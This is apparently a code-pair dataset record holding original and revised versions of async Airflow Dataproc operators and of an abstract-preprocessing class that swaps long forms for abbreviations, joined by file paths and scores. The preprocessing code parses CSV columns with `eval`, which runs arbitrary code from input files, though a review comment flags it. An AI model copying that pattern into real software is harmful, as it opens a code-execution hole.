        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :param polling_interval: Time in seconds to sleep between checks of cluster status
    """

    def __init__(
        self,
        *,
        polling_interval: float = 5.0,
        **kwargs: Any,
    ):
        super().__init__(**kwargs)
        # Seconds between status polls performed by the deferral trigger.
        self.polling_interval = polling_interval
        # The trigger deadline below needs a finite number; fall back to 24
        # hours when the caller did not set a request timeout.
        if self.timeout is None:
            self.timeout: float = 24 * 60 * 60

    def execute(self, context: "Context") -> None:
        """Call delete cluster API and defer to wait for cluster to completely deleted"""
        hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
        self.log.info("Deleting cluster: %s", self.cluster_name)
        # Issue the delete request synchronously; completion is awaited by
        # the trigger below.
        hook.delete_cluster(
            project_id=self.project_id,
            region=self.region,
            cluster_name=self.cluster_name,
            cluster_uuid=self.cluster_uuid,
            request_id=self.request_id,
            retry=self.retry,
            # NOTE(review): unlike the create path, ``timeout=self.timeout``
            # is not forwarded to the hook here — confirm whether that
            # omission is intentional.
            metadata=self.metadata,
        )
        # Deadline after which the trigger should stop waiting for deletion.
        end_time: float = time.monotonic() + self.timeout
        self.defer(
            trigger=DataprocDeleteClusterTrigger(
                project_id=self.project_id,
                region=self.region,
                cluster_name=self.cluster_name,
                request_id=self.request_id,
                retry=self.retry,
                end_time=end_time,
                metadata=self.metadata,
            ),
            method_name="execute_complete",
        )

    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
        """
        Callback for when the trigger fires - returns immediately.

        Relies on trigger to throw an exception, otherwise it assumes execution was
        successful.
        """
        if event and event["status"] == "error":
            raise AirflowException(event["message"])
        elif event is None:
            raise AirflowException("No event received in trigger callback")
        self.log.info("Cluster deleted.")
class DataprocSubmitJobOperatorAsync(DataprocSubmitJobOperator):
    """
    Submits a job to a cluster and wait until is completely finished or any error occurs.

    :param project_id: Optional. The ID of the Google Cloud project that the job belongs to.
    :param region: Required. The Cloud Dataproc region in which to handle the request.
    :param job: Required. The job resource.
        If a dict is provided, it must be of the same form as the protobuf message
        class:`~google.cloud.dataproc_v1.types.Job`
    :param request_id: Optional. A unique id used to identify the request. If the server receives two
        ``SubmitJobRequest`` requests with the same id, then the second request will be ignored and the first
        ``Job`` created and stored in the backend is returned.
        It is recommended to always set this value to a UUID.
    :param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
        retried.
    :param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
        ``retry`` is specified, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :param cancel_on_kill: Flag which indicates whether cancel the hook's job or not, when on_kill is called
    """
    def execute(self, context: "Context") -> None:
        """
        Airflow runs this method on the worker and defers using the trigger.
        Submit the job and get the job_id using which we defer and poll in trigger
        """
        self.log.info("Submitting job \n %s", self.job)
        # Stored on the instance (not a local) -- presumably so the parent
        # operator's on_kill() can cancel via self.hook/self.job_id; confirm.
        self.hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
        job_object = self.hook.submit_job(
            project_id=self.project_id,
            region=self.region,
            job=self.job,
            request_id=self.request_id,
            retry=self.retry,
            timeout=self.timeout,
            metadata=self.metadata,
        )
        job_id = job_object.reference.job_id
        self.log.info("Job %s submitted successfully.", job_id)
        self.job_id = job_id
        # Defer to the triggerer, which polls the job until a terminal state;
        # control then resumes in execute_complete().
        self.defer(
            timeout=self.execution_timeout,
            trigger=DataProcSubmitTrigger(
                gcp_conn_id=self.gcp_conn_id,
                dataproc_job_id=job_id,
                project_id=self.project_id,
                region=self.region,
            ),
            method_name="execute_complete",
        )
    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, str]] = None) -> str:
        """
        Callback for when the trigger fires - returns immediately.

        Relies on trigger to throw an exception, otherwise it assumes execution was
        successful.

        :return: the finished job's id on success.
        :raises AirflowException: if the trigger reported an error or no event arrived.
        """
        if event:
            if event["status"] == "success":
                self.log.info("Job %s completed successfully.", event["job_id"])
                return event["job_id"]
            raise AirflowException(event["message"])
        raise AirflowException("No event received in trigger callback")
class DataprocUpdateClusterOperatorAsync(DataprocUpdateClusterOperator):
    """
    Updates an existing cluster in a Google cloud platform project.

    :param region: Required. The Cloud Dataproc region in which to handle the request.
    :param project_id: Optional. The ID of the Google Cloud project the cluster belongs to.
    :param cluster_name: Required. The cluster name.
    :param cluster: Required. The changes to the cluster.
        If a dict is provided, it must be of the same form as the protobuf message
        :class:`~google.cloud.dataproc_v1.types.Cluster`
    :param update_mask: Required. Specifies the path, relative to ``Cluster``, of the field to update. For
        example, to change the number of workers in a cluster to 5, the ``update_mask`` parameter would be
        specified as ``config.worker_config.num_instances``, and the ``PATCH`` request body would specify the
        new value. If a dict is provided, it must be of the same form as the protobuf message
        :class:`~google.protobuf.field_mask_pb2.FieldMask`
    :param graceful_decommission_timeout: Optional. Timeout for graceful YARN decommissioning. Graceful
        decommissioning allows removing nodes from the cluster without interrupting jobs in progress. Timeout
        specifies how long to wait for jobs in progress to finish before forcefully removing nodes (and
        potentially interrupting jobs). Default timeout is 0 (for forceful decommission), and the maximum
        allowed timeout is 1 day.
    :param request_id: Optional. A unique id used to identify the request. If the server receives two
        ``UpdateClusterRequest`` requests with the same id, then the second request will be ignored and the
        first ``google.longrunning.Operation`` created and stored in the backend is returned.
    :param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
        retried.
    :param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
        ``retry`` is specified, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud.
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :param polling_interval: Time in seconds to sleep between checks of cluster status
    """
    def __init__(
        self,
        *,
        polling_interval: float = 5.0,
        **kwargs: Any,
    ):
        """Store the trigger poll interval; all other kwargs go to the parent operator."""
        super().__init__(**kwargs)
        self.polling_interval = polling_interval
        # The deferred trigger needs a finite deadline, so fall back to a
        # 24-hour ceiling when the parent operator left timeout unset.
        if self.timeout is None:
            self.timeout: float = 24 * 60 * 60
    def execute(self, context: "Context") -> None:
        """Call update cluster API and defer to wait for cluster update to complete"""
        hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
        # Save data required by extra links no matter what the cluster status will be
        DataprocLink.persist(
            context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
        )
        self.log.info("Updating %s cluster.", self.cluster_name)
        hook.update_cluster(
            project_id=self.project_id,
            region=self.region,
            cluster_name=self.cluster_name,
            cluster=self.cluster,
            update_mask=self.update_mask,
            graceful_decommission_timeout=self.graceful_decommission_timeout,
            request_id=self.request_id,
            retry=self.retry,
            metadata=self.metadata,
        )
        end_time: float = time.monotonic() + self.timeout
        # NOTE(review): reuses DataprocCreateClusterTrigger to poll the
        # cluster state after the update request -- confirm that a dedicated
        # "update" trigger is intentionally not used here.
        self.defer(
            trigger=DataprocCreateClusterTrigger(
                project_id=self.project_id,
                region=self.region,
                cluster_name=self.cluster_name,
                end_time=end_time,
                metadata=self.metadata,
                gcp_conn_id=self.gcp_conn_id,
                polling_interval=self.polling_interval,
            ),
            method_name="execute_complete",
        )
    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
        """
        Callback for when the trigger fires - returns immediately.

        Relies on trigger to throw an exception, otherwise it assumes execution was
        successful.
        """
        if event and event["status"] == "success":
            self.log.info("Updated %s cluster.", event["cluster_name"])
            return
        if event and event["status"] == "error":
            raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback") | astronomer/providers/google/cloud/operators/dataproc.py | import time
from typing import Any, Dict, Optional
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.dataproc import DataprocHook
from airflow.providers.google.cloud.links.dataproc import (
DATAPROC_CLUSTER_LINK,
DataprocLink,
)
from airflow.providers.google.cloud.operators.dataproc import (
DataprocCreateClusterOperator,
DataprocDeleteClusterOperator,
DataprocSubmitJobOperator,
DataprocUpdateClusterOperator,
)
from airflow.utils.context import Context
from google.api_core.exceptions import AlreadyExists
from astronomer.providers.google.cloud.triggers.dataproc import (
DataprocCreateClusterTrigger,
DataprocDeleteClusterTrigger,
DataProcSubmitTrigger,
)
class DataprocCreateClusterOperatorAsync(DataprocCreateClusterOperator):
    """
    Create a new cluster on Google Cloud Dataproc Asynchronously.

    :param project_id: The ID of the google cloud project in which
        to create the cluster. (templated)
    :param cluster_name: Name of the cluster to create
    :param labels: Labels that will be assigned to created cluster
    :param cluster_config: Required. The cluster config to create.
        If a dict is provided, it must be of the same form as the protobuf message
        :class:`~google.cloud.dataproc_v1.types.ClusterConfig`
    :param virtual_cluster_config: Optional. The virtual cluster config, used when creating a Dataproc
        cluster that does not directly control the underlying compute resources, for example, when creating a
        `Dataproc-on-GKE cluster
        <https://cloud.google.com/dataproc/docs/concepts/jobs/dataproc-gke#create-a-dataproc-on-gke-cluster>`
    :param region: The specified region where the dataproc cluster is created.
    :param delete_on_error: If true the cluster will be deleted if created with ERROR state. Default
        value is true.
    :param use_if_exists: If true use existing cluster
    :param request_id: Optional. A unique id used to identify the request. If the server receives two
        ``DeleteClusterRequest`` requests with the same id, then the second request will be ignored and the
        first ``google.longrunning.Operation`` created and stored in the backend is returned.
    :param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
        retried.
    :param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
        ``retry`` is specified, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud.
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :param polling_interval: Time in seconds to sleep between checks of cluster status
    """
    def __init__(
        self,
        *,
        polling_interval: float = 5.0,
        **kwargs: Any,
    ):
        """Store the trigger poll interval; all other kwargs go to the parent operator."""
        super().__init__(**kwargs)
        self.polling_interval = polling_interval
        # NOTE(review): unlike the delete/update async variants, no 24-hour
        # fallback is applied to self.timeout here, so the parent operator's
        # default timeout is assumed to be non-None -- confirm.
    def execute(self, context: Context) -> None:  # type: ignore[override]
        """Call create cluster API and defer to DataprocCreateClusterTrigger to check the status"""
        # Forward the impersonation chain so short-term credential
        # impersonation works here exactly as it does in the other async
        # Dataproc operators of this module (previously it was dropped).
        hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
        # Save data required by extra links no matter what the cluster status will be.
        DataprocLink.persist(
            context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
        )
        try:
            hook.create_cluster(
                region=self.region,
                project_id=self.project_id,
                cluster_name=self.cluster_name,
                cluster_config=self.cluster_config,
                labels=self.labels,
                request_id=self.request_id,
                retry=self.retry,
                timeout=self.timeout,
                metadata=self.metadata,
            )
        except AlreadyExists:
            # Re-raise unless the caller explicitly opted into reusing an
            # existing cluster of the same name.
            if not self.use_if_exists:
                raise
            self.log.info("Cluster already exists.")
        end_time: float = time.monotonic() + self.timeout
        # Hand polling over to the triggerer; control resumes in
        # execute_complete() once the cluster reaches a terminal state.
        self.defer(
            trigger=DataprocCreateClusterTrigger(
                project_id=self.project_id,
                region=self.region,
                cluster_name=self.cluster_name,
                end_time=end_time,
                metadata=self.metadata,
                delete_on_error=self.delete_on_error,
                cluster_config=self.cluster_config,
                labels=self.labels,
                gcp_conn_id=self.gcp_conn_id,
                polling_interval=self.polling_interval,
            ),
            method_name="execute_complete",
        )
    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
        """
        Callback for when the trigger fires - returns immediately.

        Relies on trigger to throw an exception, otherwise it assumes execution was
        successful.

        :return: the cluster payload the trigger delivered on success.
        :raises AirflowException: if the trigger reported an error or no event arrived.
        """
        if event and event["status"] == "success":
            self.log.info("Cluster created successfully \n %s", event["data"])
            return event["data"]
        elif event and event["status"] == "error":
            raise AirflowException(event["message"])
        raise AirflowException("No event received in trigger callback")
class DataprocDeleteClusterOperatorAsync(DataprocDeleteClusterOperator):
    """
    Asynchronous variant of the Dataproc cluster-delete operator: issues the
    delete request, then defers to a trigger that polls until the cluster is
    fully removed.

    :param region: Required. The Cloud Dataproc region in which to handle the request (templated).
    :param cluster_name: Required. The cluster name (templated).
    :param project_id: Optional. The ID of the Google Cloud project that the cluster belongs to (templated).
    :param cluster_uuid: Optional. If set, the RPC should fail when no cluster with this UUID exists.
    :param request_id: Optional. A unique id used to identify the request. A second
        ``DeleteClusterRequest`` carrying the same id is ignored and the first
        ``google.longrunning.Operation`` stored in the backend is returned.
    :param retry: A retry object used to retry requests; ``None`` disables retrying.
    :param timeout: Seconds to wait for the request to complete. When ``retry`` is
        given, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud.
    :param impersonation_chain: Optional service account (or chain of accounts) to
        impersonate using short-term credentials. For a single account, it must grant
        the originating account the Service Account Token Creator IAM role; for a
        sequence, each identity must grant that role to the one directly preceding
        it, with the first granting it to the originating account (templated).
    :param polling_interval: Time in seconds to sleep between checks of cluster status.
    """
    def __init__(
        self,
        *,
        polling_interval: float = 5.0,
        **kwargs: Any,
    ):
        """Record the poll interval and cap a missing timeout at 24 hours."""
        super().__init__(**kwargs)
        self.polling_interval = polling_interval
        # The trigger needs a finite deadline, so substitute a 24-hour
        # ceiling when the parent operator was built without a timeout.
        self.timeout = self.timeout if self.timeout is not None else 24 * 60 * 60
    def execute(self, context: "Context") -> None:
        """Fire the cluster-delete request, then defer until the cluster is gone."""
        self.log.info("Deleting cluster: %s", self.cluster_name)
        dataproc_hook = DataprocHook(
            gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain
        )
        dataproc_hook.delete_cluster(
            region=self.region,
            project_id=self.project_id,
            cluster_name=self.cluster_name,
            cluster_uuid=self.cluster_uuid,
            request_id=self.request_id,
            retry=self.retry,
            metadata=self.metadata,
        )
        deadline = time.monotonic() + self.timeout
        # Free the worker slot; the trigger polls until deletion finishes and
        # control resumes in execute_complete().
        self.defer(
            method_name="execute_complete",
            trigger=DataprocDeleteClusterTrigger(
                project_id=self.project_id,
                region=self.region,
                cluster_name=self.cluster_name,
                request_id=self.request_id,
                retry=self.retry,
                end_time=deadline,
                metadata=self.metadata,
            ),
        )
    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
        """
        Trigger callback: re-raise any error the trigger reported, otherwise
        treat the deletion as finished.
        """
        if event is None:
            raise AirflowException("No event received in trigger callback")
        if event and event["status"] == "error":
            raise AirflowException(event["message"])
        self.log.info("Cluster deleted.")
class DataprocSubmitJobOperatorAsync(DataprocSubmitJobOperator):
    """
    Asynchronous variant of the Dataproc job-submit operator: submits the job,
    then defers to a trigger that polls it until completion or failure.

    :param project_id: Optional. The ID of the Google Cloud project that the job belongs to.
    :param region: Required. The Cloud Dataproc region in which to handle the request.
    :param job: Required. The job resource. A dict must match the protobuf message
        class:`~google.cloud.dataproc_v1.types.Job`.
    :param request_id: Optional. A unique id used to identify the request. A second
        ``SubmitJobRequest`` carrying the same id is ignored and the first ``Job``
        stored in the backend is returned. Recommended: always set it to a UUID.
    :param retry: A retry object used to retry requests; ``None`` disables retrying.
    :param timeout: Seconds to wait for the request to complete. When ``retry`` is
        given, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
    :param impersonation_chain: Optional service account (or chain of accounts) to
        impersonate using short-term credentials. For a single account, it must grant
        the originating account the Service Account Token Creator IAM role; for a
        sequence, each identity must grant that role to the one directly preceding
        it, with the first granting it to the originating account (templated).
    :param cancel_on_kill: Flag which indicates whether cancel the hook's job or not, when on_kill is called
    """
    def execute(self, context: "Context") -> None:
        """Submit the job on the worker, record its id, and defer until it finishes."""
        self.log.info("Submitting job \n %s", self.job)
        # Kept on the instance (not a local) -- presumably so on_kill() can
        # cancel the running job through self.hook/self.job_id; confirm
        # against the parent operator.
        self.hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
        submitted = self.hook.submit_job(
            region=self.region,
            project_id=self.project_id,
            job=self.job,
            request_id=self.request_id,
            retry=self.retry,
            timeout=self.timeout,
            metadata=self.metadata,
        )
        self.job_id = submitted.reference.job_id
        self.log.info("Job %s submitted successfully.", self.job_id)
        self.defer(
            timeout=self.execution_timeout,
            trigger=DataProcSubmitTrigger(
                gcp_conn_id=self.gcp_conn_id,
                dataproc_job_id=self.job_id,
                project_id=self.project_id,
                region=self.region,
            ),
            method_name="execute_complete",
        )
    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, str]] = None) -> str:
        """
        Trigger callback: return the finished job's id, or re-raise whatever
        error the trigger reported.
        """
        if not event:
            raise AirflowException("No event received in trigger callback")
        if event["status"] != "success":
            raise AirflowException(event["message"])
        self.log.info("Job %s completed successfully.", event["job_id"])
        return event["job_id"]
class DataprocUpdateClusterOperatorAsync(DataprocUpdateClusterOperator):
    """
    Updates an existing cluster in a Google cloud platform project.

    :param region: Required. The Cloud Dataproc region in which to handle the request.
    :param project_id: Optional. The ID of the Google Cloud project the cluster belongs to.
    :param cluster_name: Required. The cluster name.
    :param cluster: Required. The changes to the cluster.
        If a dict is provided, it must be of the same form as the protobuf message
        :class:`~google.cloud.dataproc_v1.types.Cluster`
    :param update_mask: Required. Specifies the path, relative to ``Cluster``, of the field to update. For
        example, to change the number of workers in a cluster to 5, the ``update_mask`` parameter would be
        specified as ``config.worker_config.num_instances``, and the ``PATCH`` request body would specify the
        new value. If a dict is provided, it must be of the same form as the protobuf message
        :class:`~google.protobuf.field_mask_pb2.FieldMask`
    :param graceful_decommission_timeout: Optional. Timeout for graceful YARN decommissioning. Graceful
        decommissioning allows removing nodes from the cluster without interrupting jobs in progress. Timeout
        specifies how long to wait for jobs in progress to finish before forcefully removing nodes (and
        potentially interrupting jobs). Default timeout is 0 (for forceful decommission), and the maximum
        allowed timeout is 1 day.
    :param request_id: Optional. A unique id used to identify the request. If the server receives two
        ``UpdateClusterRequest`` requests with the same id, then the second request will be ignored and the
        first ``google.longrunning.Operation`` created and stored in the backend is returned.
    :param retry: A retry object used to retry requests. If ``None`` is specified, requests will not be
        retried.
    :param timeout: The amount of time, in seconds, to wait for the request to complete. Note that if
        ``retry`` is specified, the timeout applies to each individual attempt.
    :param metadata: Additional metadata that is provided to the method.
    :param gcp_conn_id: The connection ID to use connecting to Google Cloud.
    :param impersonation_chain: Optional service account to impersonate using short-term
        credentials, or chained list of accounts required to get the access_token
        of the last account in the list, which will be impersonated in the request.
        If set as a string, the account must grant the originating account
        the Service Account Token Creator IAM role.
        If set as a sequence, the identities from the list must grant
        Service Account Token Creator IAM role to the directly preceding identity, with first
        account from the list granting this role to the originating account (templated).
    :param polling_interval: Time in seconds to sleep between checks of cluster status
    """
    def __init__(
        self,
        *,
        polling_interval: float = 5.0,
        **kwargs: Any,
    ):
        """Store the trigger poll interval; all other kwargs go to the parent operator."""
        super().__init__(**kwargs)
        self.polling_interval = polling_interval
        # The deferred trigger needs a finite deadline, so fall back to a
        # 24-hour ceiling when the parent operator left timeout unset.
        if self.timeout is None:
            self.timeout: float = 24 * 60 * 60
    def execute(self, context: "Context") -> None:
        """Call update cluster API and defer to wait for cluster update to complete"""
        hook = DataprocHook(gcp_conn_id=self.gcp_conn_id, impersonation_chain=self.impersonation_chain)
        # Save data required by extra links no matter what the cluster status will be
        DataprocLink.persist(
            context=context, task_instance=self, url=DATAPROC_CLUSTER_LINK, resource=self.cluster_name
        )
        self.log.info("Updating %s cluster.", self.cluster_name)
        hook.update_cluster(
            project_id=self.project_id,
            region=self.region,
            cluster_name=self.cluster_name,
            cluster=self.cluster,
            update_mask=self.update_mask,
            graceful_decommission_timeout=self.graceful_decommission_timeout,
            request_id=self.request_id,
            retry=self.retry,
            metadata=self.metadata,
        )
        end_time: float = time.monotonic() + self.timeout
        # NOTE(review): reuses DataprocCreateClusterTrigger to poll the
        # cluster state after the update request -- confirm that a dedicated
        # "update" trigger is intentionally not used here.
        self.defer(
            trigger=DataprocCreateClusterTrigger(
                project_id=self.project_id,
                region=self.region,
                cluster_name=self.cluster_name,
                end_time=end_time,
                metadata=self.metadata,
                gcp_conn_id=self.gcp_conn_id,
                polling_interval=self.polling_interval,
            ),
            method_name="execute_complete",
        )
    def execute_complete(self, context: Dict[str, Any], event: Optional[Dict[str, Any]] = None) -> Any:
        """
        Callback for when the trigger fires - returns immediately.

        Relies on trigger to throw an exception, otherwise it assumes execution was
        successful.
        """
        if event and event["status"] == "success":
            self.log.info("Updated %s cluster.", event["cluster_name"])
            return
        if event and event["status"] == "error":
            raise AirflowException(event["message"])
raise AirflowException("No event received in trigger callback") | 0.887613 | 0.452899 |
import os
from typing import List, Tuple
import random
import string
from collections import OrderedDict
import pandas as pd
from engine.utils.preprocessing import Preprocessor
from engine.utils.preprocess_utils import delete_overlapping_tuples
from engine.preprocess.preprocess_superclass import Preprocess
class ReplaceLongForms(Preprocess):
    """
    When the instance of the class is executed, it will replace the
    long forms by short forms.

    You can define the probability of a substitution, and the min length
    of the abstracts.
    """
    def __init__(self, dataset: str, df_dictionary: pd.DataFrame, probability: float = 0.3, length_abstract: int = 200) -> None:
        """Configure input/output folders, the replacement probability and the minimum abstract length."""
        super().__init__(dataset, df_dictionary)
        self.input_path = self.input_path + str("identified")
        self.output_path = self.output_path + str("replaced")
        self.probability = probability
        self.preprocessor = Preprocessor(num_words_to_remove=50, remove_punctuation=False)
        self.length_abstract = length_abstract
        # Number of random characters in a batch key (see generate_key).
        self.len_batch_key = 8
        # Running count of how many times each long form got replaced.
        self.long_form_counts: OrderedDict[str, int] = OrderedDict(
            dict.fromkeys(self.dictionary.keys(), 0)
        )
        # Unique keys of every output row in which each long form was replaced.
        self.long_form_loc: OrderedDict[str, list] = OrderedDict({
            key: [] for key in self.dictionary.keys()
        })
        # ^ dict.fromkeys(keys, []) would share ONE list across all keys (an
        # append would show up under every key); the comprehension gives each
        # key its own list.
    def __call__(self) -> None:
        """
        When the instance of the class is executed, it will replace the
        long forms by short forms.
        """
        super().__call__()
        super().batch_run()
    def batch_run(self) -> None:
        """
        Empty because the super class method is used.
        """
    def decision(self) -> bool:
        """
        Return True/False based on a given probability.
        """
        return random.random() < self.probability
    def generate_key(self) -> str:
        """
        Return a random key of ``self.len_batch_key`` uppercase letters and
        digits, used as a batch prefix for the unique keys of output rows.
        """
        return ''.join(
            random.choice(string.ascii_uppercase + string.digits)
            for _ in range(self.len_batch_key)
        )
    def replace_abstract(
        self,
        abstract: str,
        long_forms: List[str],
        span: List[Tuple[int, int]],
    ) -> Tuple[str, List[str], List[Tuple[int, int]]]:
        """
        Given an abstract, it will replace the long forms by short forms.
        If the short form was already in the text, it wont add more short forms.
        Will return the replaced abstract and the list spans.
        """
        replaced_abstract: str = abstract
        span_updated: List[Tuple[int, int]] = []
        long_forms_updated: List[str] = []
        dict_span_lf = dict(zip(span, long_forms))
        # Deal with tuple overlapping
        clean_tuples = delete_overlapping_tuples(span)
        # Iterate over each long form and span. Replacements change the string
        # length, so later spans are shifted by the accumulated difference.
        correction_index: int = 0
        for tup in clean_tuples:
            if self.decision():
                long_form = dict_span_lf[tup]
                replaced_abstract = str(
                    replaced_abstract[: tup[0] + correction_index] + self.dictionary[long_form] +
                    replaced_abstract[tup[1] + correction_index :],
                )
                span_updated.append((
                    tup[0] + correction_index,
                    tup[0] + correction_index + len(self.dictionary[long_form])
                ))
                correction_index = correction_index + len(self.dictionary[long_form]
                                                          ) - len(long_form)
                long_forms_updated.append(long_form)
        return replaced_abstract, long_forms_updated, span_updated
    def single_run(self, filename: str) -> None:
        """
        Will load the csv file with the abstracts and replace the long
        forms by short forms. Will add a unique key to each output row.
        """
        # Open csv file with abstracts.
        # NOTE(review): ``eval`` as a converter executes arbitrary Python from
        # the CSV -- consider ``ast.literal_eval`` if the input is untrusted.
        df_abstracts = pd.read_csv(
            os.path.join(self.input_path, filename), converters={'long_forms': eval, 'span': eval}
        )
        df_results: pd.DataFrame = pd.DataFrame(
            columns=['long_forms', 'span_short_form', 'replaced_abstract', 'unique_key']
        )
        batch_key: str = self.generate_key()
        for i, row in df_abstracts.iterrows():
            # Check that the list is not empty and the length of the abstract.
            if row['long_forms'] != [] and len(row['abstract']) > self.length_abstract:
                # Replace long forms. Need to convert span to tuples.
                replaced_abstract, long_forms_updated, span_updated = self.replace_abstract(
                    row['abstract'], row['long_forms'], row['span']
                )
                # Store in dataframe if not empty
                if long_forms_updated != []:
                    # Define unique key
                    unique_key: str = batch_key + "_" + str(i)
                    # Update the dictionaries with the counts and keys
                    for long_form in long_forms_updated:
                        self.long_form_counts[long_form] += 1
                        self.long_form_loc[long_form].append(unique_key)
                    # NOTE(review): DataFrame.append in a loop is deprecated
                    # (removed in pandas 2.0) and quadratic; collect rows in a
                    # list and build the frame once instead.
                    df_results = df_results.append({
                        'long_forms': long_forms_updated, 'span_short_form': span_updated,
                        'replaced_abstract': replaced_abstract, 'unique_key': unique_key
                    },
                                                   ignore_index=True)
        # Export df to csv
        new_filename: str = "{}.csv".format(batch_key)
        df_results.to_csv(os.path.join(self.output_path, new_filename), index=False)
        # Export dictionary to csv
        df_counts = pd.DataFrame(
            list(self.long_form_counts.items()), columns=['long_form', 'counts']
        )
        df_counts['unique_key'] = list(self.long_form_loc.values())
df_counts.to_csv(os.path.join(self.output_path, "counts.csv"), index=False) | engine/preprocess/replace_longforms.py | import os
from typing import List, Tuple
import random
import string
from collections import OrderedDict
import pandas as pd
from engine.utils.preprocessing import Preprocessor
from engine.utils.preprocess_utils import delete_overlapping_tuples
from engine.preprocess.preprocess_superclass import Preprocess
class ReplaceLongForms(Preprocess):
    """
    Replace long forms by their short forms in a corpus of abstracts.

    When the instance is executed it reads the "identified" CSVs, performs
    probabilistic replacements and writes the "replaced" CSVs plus a
    per-long-form usage count file.

    :param dataset: Dataset name forwarded to the ``Preprocess`` base class.
    :param df_dictionary: Long-form -> short-form dictionary source.
    :param probability: Chance that any individual long form is replaced.
    :param length_abstract: Minimum abstract length (characters) to process.
    """
    def __init__(self, dataset: str, df_dictionary: pd.DataFrame, probability: float = 0.3, length_abstract: int = 200) -> None:
        super().__init__(dataset, df_dictionary)
        self.input_path = self.input_path + str("identified")
        self.output_path = self.output_path + str("replaced")
        self.probability = probability
        self.preprocessor = Preprocessor(num_words_to_remove=50, remove_punctuation=False)
        self.length_abstract = length_abstract
        # Number of random characters in a batch key (see generate_key).
        self.len_batch_key = 8
        # Running count of how many times each long form got replaced.
        self.long_form_counts: OrderedDict[str, int] = OrderedDict(
            dict.fromkeys(self.dictionary.keys(), 0)
        )
        # Unique keys of every output row in which each long form was
        # replaced. A comprehension (not dict.fromkeys(keys, [])) so each key
        # gets its own list instead of one shared instance.
        self.long_form_loc: OrderedDict[str, list] = OrderedDict({
            key: [] for key in self.dictionary.keys()
        })
    def __call__(self) -> None:
        """
        When the instance of the class is executed, it will replace the
        long forms by short forms.
        """
        super().__call__()
        super().batch_run()
    def batch_run(self) -> None:
        """
        Empty because the super class method is used.
        """
    def decision(self) -> bool:
        """
        Return True/False based on a given probability.
        """
        return random.random() < self.probability
    def generate_key(self) -> str:
        """
        Return a random key of ``self.len_batch_key`` uppercase letters and
        digits, used as a batch prefix for the unique keys of output rows.
        """
        return ''.join(
            random.choice(string.ascii_uppercase + string.digits)
            for _ in range(self.len_batch_key)
        )
    def replace_abstract(
        self,
        abstract: str,
        long_forms: List[str],
        span: List[Tuple[int, int]],
    ) -> Tuple[str, List[str], List[Tuple[int, int]]]:
        """
        Replace a random subset of the long forms in ``abstract`` by their
        short forms.

        :param abstract: Text in which replacements are made.
        :param long_forms: Long forms found in the abstract, parallel to ``span``.
        :param span: (start, end) character offsets of each long form.
        :return: The rewritten abstract, the long forms actually replaced,
            and the (start, end) spans of the inserted short forms.
        """
        replaced_abstract: str = abstract
        span_updated: List[Tuple[int, int]] = []
        long_forms_updated: List[str] = []
        dict_span_lf = dict(zip(span, long_forms))
        # Drop overlapping spans so one replacement cannot corrupt another.
        clean_tuples = delete_overlapping_tuples(span)
        # Replacements change the string length, so every later span must be
        # shifted by the accumulated length difference.
        correction_index: int = 0
        for tup in clean_tuples:
            if self.decision():
                long_form = dict_span_lf[tup]
                short_form = self.dictionary[long_form]
                start = tup[0] + correction_index
                end = tup[1] + correction_index
                replaced_abstract = (
                    replaced_abstract[:start] + short_form + replaced_abstract[end:]
                )
                span_updated.append((start, start + len(short_form)))
                correction_index += len(short_form) - len(long_form)
